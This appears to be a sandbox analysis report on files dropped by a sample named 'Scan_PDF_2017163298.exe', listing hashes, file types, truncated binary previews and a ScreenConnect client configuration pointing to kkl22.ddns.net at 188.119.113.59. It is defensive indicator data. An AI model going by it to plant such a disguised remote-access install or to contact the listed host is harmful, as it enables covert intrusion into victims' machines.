                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):11776
                                                                                          Entropy (8bit):5.267782165666963
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                          MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                          SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                          SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                          SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1721856
                                                                                          Entropy (8bit):6.639136400085158
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                          MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                          SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                          SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                          SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                          Process:C:\Users\user\Desktop\Scan_PDF_2017163298.exe
                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                          Category:dropped
                                                                                          Size (bytes):13496320
                                                                                          Entropy (8bit):7.96734617136158
                                                                                          Encrypted:false
                                                                                          SSDEEP:196608:L53JLR3LGMLiW35H53JLR3LGMLL53JLR3LGMLU53JLR3LGMLR53JLR3LGMLf53JU:RTiutTRT0TLT1T8T
                                                                                          MD5:099A8FD56EE4555DA735AC803FE584D7
                                                                                          SHA1:02BACE1FA08172B05B3E8E0730B3BE3EE48DD85C
                                                                                          SHA-256:F1C55A85D2B72AE69043946FEE07BF26DEC72C1DF7DFED520A9C2D3580C5EBCC
                                                                                          SHA-512:FEE443E282904CD57A76D11C5538ED723EA031099B8113B2C0388A4D6E26914E7C5F7A013BEE2214815E4BC9D47369BB55773F3BF81D7CF773E79A52E8CADB34
                                                                                          Malicious:false
                                                                                          Preview:......................>.......................................................{...n...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                          Category:dropped
                                                                                          Size (bytes):13496320
                                                                                          Entropy (8bit):7.96734617136158
                                                                                          Encrypted:false
                                                                                          SSDEEP:196608:L53JLR3LGMLiW35H53JLR3LGMLL53JLR3LGMLU53JLR3LGMLR53JLR3LGMLf53JU:RTiutTRT0TLT1T8T
                                                                                          MD5:099A8FD56EE4555DA735AC803FE584D7
                                                                                          SHA1:02BACE1FA08172B05B3E8E0730B3BE3EE48DD85C
                                                                                          SHA-256:F1C55A85D2B72AE69043946FEE07BF26DEC72C1DF7DFED520A9C2D3580C5EBCC
                                                                                          SHA-512:FEE443E282904CD57A76D11C5538ED723EA031099B8113B2C0388A4D6E26914E7C5F7A013BEE2214815E4BC9D47369BB55773F3BF81D7CF773E79A52E8CADB34
                                                                                          Malicious:false
                                                                                          Preview:......................>.......................................................{...n...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                          Category:dropped
                                                                                          Size (bytes):13496320
                                                                                          Entropy (8bit):7.96734617136158
                                                                                          Encrypted:false
                                                                                          SSDEEP:196608:L53JLR3LGMLiW35H53JLR3LGMLL53JLR3LGMLU53JLR3LGMLR53JLR3LGMLf53JU:RTiutTRT0TLT1T8T
                                                                                          MD5:099A8FD56EE4555DA735AC803FE584D7
                                                                                          SHA1:02BACE1FA08172B05B3E8E0730B3BE3EE48DD85C
                                                                                          SHA-256:F1C55A85D2B72AE69043946FEE07BF26DEC72C1DF7DFED520A9C2D3580C5EBCC
                                                                                          SHA-512:FEE443E282904CD57A76D11C5538ED723EA031099B8113B2C0388A4D6E26914E7C5F7A013BEE2214815E4BC9D47369BB55773F3BF81D7CF773E79A52E8CADB34
                                                                                          Malicious:false
                                                                                          Preview:......................>.......................................................{...n...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):440440
                                                                                          Entropy (8bit):6.66516385128456
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:zuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvsb8l8l8O:zuH2anwohwQUv5uH2anwohwQUvW
                                                                                          MD5:6FAD06A2896C5416FFC49CE03D00F5DE
                                                                                          SHA1:B14AD5AC0D6867466C43A5F03B7567F8E28C11CF
                                                                                          SHA-256:2B103F5CC742D2F017C476E55F27FE81A1D3B5681D1D3150648BBBDFAC62EEFF
                                                                                          SHA-512:A20C8A762BBAA0C9B5C28538EAE6A47F8182BA5DD112AC72B3D527D7D6BCB8D0FC9DF5BDF728F9B8CA9F0B529EA2F74D11F56AAA429D2C7533CB4F9B825988D6
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI996C.tmp, Author: Joe Security
                                                                                          Preview:...@IXOS.@.....@..BY.@.....@.....@.....@.....@.....@......&.{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):207360
                                                                                          Entropy (8bit):6.573348437503042
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):207360
                                                                                          Entropy (8bit):6.573348437503042
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.1618672106258188
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:JSbX72FjtAGiLIlHVRpMh/7777777777777777777777777vDHF/XSy9Ap3Xl0i5:JjQI5clX/w6F
                                                                                          MD5:C1B79DE9DDD232DD6DB99A7545031774
                                                                                          SHA1:94724C602E71186B80F0F3E11B487536C3BE46ED
                                                                                          SHA-256:8C0EB5B64B867EFB10DEF8C2E46844F795DD90B8E23D740597F5B3F35F6CD7BE
                                                                                          SHA-512:DC531DDC0D18991816731AD556649D2392FDD9F9C63150B5F8859DA3D361CA2368ECBC77D097E8C709B1AF80E363EC6EE190814C03CE24E5B5A8923C29626F1C
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.8171529868471552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:98PhHuRc06WX4MnT5s4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:ghH18nT6KppifXdfqHgcNMf8
                                                                                          MD5:B962409FB1C3CD3E8CC60CCBF069657E
                                                                                          SHA1:680185ABE8EE9B73B0E8F1D56E6449DECBA4443D
                                                                                          SHA-256:2665EE8ABC96EFA359448BD3B14A2830B9AD5500EABBBB775F826DC5E8D91DCF
                                                                                          SHA-512:1EC1BD20B196C7B855FFF4E6357850BAA6C2F2EB1B6A1F92DAEA0ECE5DEF6616B4F76B6789D90608E5B49657A9B468D08F4458C4FE2252DA5735F480C2C82E66
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 4 bits/pixel, 32x32, 4 bits/pixel
                                                                                          Category:dropped
                                                                                          Size (bytes):16968
                                                                                          Entropy (8bit):7.91093498836533
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:trxUYPf4jttLkFh4z+3VCrxUYPf4jttLkFh4z+3VCrxUYPf4jttLkFh4z+3Ve:tV5wttQhLQV5wttQhLQV5wttQhLg
                                                                                          MD5:8B946361C69083EE6869CA667DA5534F
                                                                                          SHA1:B32B246AAF418127D6132666624236E4731038AB
                                                                                          SHA-256:C8DE9FEF9D282ADBC75D5A082BAE43E97B9EBC8A0EF6E3925CF9F5D790CD34CA
                                                                                          SHA-512:6BCB946CEC69BD23EAF8874F6B11341F8C2E6D74E036BCC17ADF2945556FDB4D43E93C9BBA99870D35E44B2405C077BCA40E984514A4BFEA43A650A69F78B20F
                                                                                          Malicious:false
                                                                                          Preview:..................6... ..........<...00..........B,.............. ..........PNG........IHDR..............{`.....IDATx..y.....s.a.`.f%(0*..*....I\...D#...r.<...^..#Q01&..E.K.....j@vA...."....00;3}..qF.>.....[..w....Mwu.W_..`0.....`0...../ ...E........!..\.PBW*..9,a..A_..?.x....J..<.Hr.?Qr.b...o.U.b......3xMwJ[.@S)g...F8.4x.h.m.`aq.R..@..P....|D..*{x.....r..)b.H....,..r..d.Nn.Q,..o..L$/..6.!..J.o*...:.$H..S.@.M"X.(3&.w~...M....Gz.7apJ......>...3O...a.k.XXl.7t..f..L..~....s.y...7j....~..., ..gq@..,J..,...Y..,..jf.+..3H..*........LH....K...H....0.\.?.[KN.t`.g..T..Q...J*.H......d ...+..I.R......s...B..2;5....z2..d.(..`Zg..:.%....r.5I..G(..k..\...a....BdS....".F.o....1..U......8.ilV..h..g.Y-....o....k.S..j..N&.6.JL..oQ.....Ilt-...M..;+.w.E%?..J.B~...%P.....a.E$.[Ts....3.q.PSi.%.........-..6..E*]..-z..q.A4.{!..L.`...."...y.Ot.{%...Lu.2Xnf..!q........#.............. ..]....8D.~...a....x`9'.....~...G<.~..x......B..~.....g.%.6....A.....`.....^6.Me..._.@..u.E..
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):360001
                                                                                          Entropy (8bit):5.362943821922388
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauC:zTtbmkExhMJCIpET
                                                                                          MD5:D8D32F10F565816BE14C84BCC1FB66BD
                                                                                          SHA1:6077F8BE899DE73E96AB2235F6A4BC3A001A8FB3
                                                                                          SHA-256:319059662FDD10F711FAF6B38CF6BC9C2418840E85FEE4A9CD5C93E6604D1D19
                                                                                          SHA-512:783BF7F646D4C063ACFB7C0811CAF4FAFF2CA3F8950A3E1E75AEE61863B4BD8EE783F2A6DAF9F0668B56DBFE232851217C31BC797859BD9B77E9AA274BE486B5
                                                                                          Malicious:false
                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):560
                                                                                          Entropy (8bit):5.041943555871559
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOFe4wvYVam/vXbAa3xT:2dL9hK6E46YP/VZa8vH
                                                                                          MD5:08F08D48547C743481D3383C35246F8C
                                                                                          SHA1:707650580A2E5EA46B1A421C0DD9D663210C995D
                                                                                          SHA-256:00620280AFD849C3AFFB956E05A239D5AC9BF9BD2B56FDBC3E003EA5B958A135
                                                                                          SHA-512:EF46426C0C3A6966B09827EE7112A3BF5D580F2BC97C1C19F12F02B6A1EFDB5D219EF04C7B7397DE98AC8C4A0A159DA660EACEE1AF163C93F51AAF68A25261F8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kkl22.ddns.net=188.119.113.59-02%2f10%2f2024%2004%3a12%3a03</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):560
                                                                                          Entropy (8bit):5.041943555871559
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOFe4wvYVam/vXbAa3xT:2dL9hK6E46YP/VZa8vH
                                                                                          MD5:08F08D48547C743481D3383C35246F8C
                                                                                          SHA1:707650580A2E5EA46B1A421C0DD9D663210C995D
                                                                                          SHA-256:00620280AFD849C3AFFB956E05A239D5AC9BF9BD2B56FDBC3E003EA5B958A135
                                                                                          SHA-512:EF46426C0C3A6966B09827EE7112A3BF5D580F2BC97C1C19F12F02B6A1EFDB5D219EF04C7B7397DE98AC8C4A0A159DA660EACEE1AF163C93F51AAF68A25261F8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kkl22.ddns.net=188.119.113.59-02%2f10%2f2024%2004%3a12%3a03</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1590
                                                                                          Entropy (8bit):5.363907225770245
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                          MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                          SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                          SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                          SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                          Malicious:false
                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):32768
                                                                                          Entropy (8bit):1.4331821567465148
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:wafu2M+xFX4jT5hUpg4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:jf5ATXegKppifXdfqHgcNMf8
                                                                                          MD5:C8F01A95CC3B981696E1F3322B48FF55
                                                                                          SHA1:789675F6483F32ECA08C0FC7CE4B0699A69BD68D
                                                                                          SHA-256:549CBE17FADF5C31AB161BCCE971AFB29B9BC5319C96626CDF51D09D1D10C810
                                                                                          SHA-512:6440BCC7B98ED4E0C502EF9E9A373D83B3652806A0D4DF680B0C20FD9273581967119660C6504AAAB21B81699F51BDE2A0E0E3CC87963457F05EFF3FEC8A159D
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.8171529868471552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:98PhHuRc06WX4MnT5s4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:ghH18nT6KppifXdfqHgcNMf8
                                                                                          MD5:B962409FB1C3CD3E8CC60CCBF069657E
                                                                                          SHA1:680185ABE8EE9B73B0E8F1D56E6449DECBA4443D
                                                                                          SHA-256:2665EE8ABC96EFA359448BD3B14A2830B9AD5500EABBBB775F826DC5E8D91DCF
                                                                                          SHA-512:1EC1BD20B196C7B855FFF4E6357850BAA6C2F2EB1B6A1F92DAEA0ECE5DEF6616B4F76B6789D90608E5B49657A9B468D08F4458C4FE2252DA5735F480C2C82E66
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):32768
                                                                                          Entropy (8bit):0.068986944787039
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOEuHJKWJjSy9HyVky6l3X:2F0i8n0itFzDHF/XSy9h3X
                                                                                          MD5:5388F8EC2F7AD1F6E98E3B510FCF394C
                                                                                          SHA1:B9C564A45A4A6BFE668E54A1A43457643818A99F
                                                                                          SHA-256:8A847D8582B829D879CC3EBC3A5505852B73869DC09559A3F4D6D487C002C87E
                                                                                          SHA-512:5DD1D717B2659634B90211C220B780E7B2840A9B932751F4AEAF6F4ED4A120340853B657ABC992FFDFB8B2EB317E68CA49F573133A763798F1FB844A23AA8827
                                                                                          Malicious:false
                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
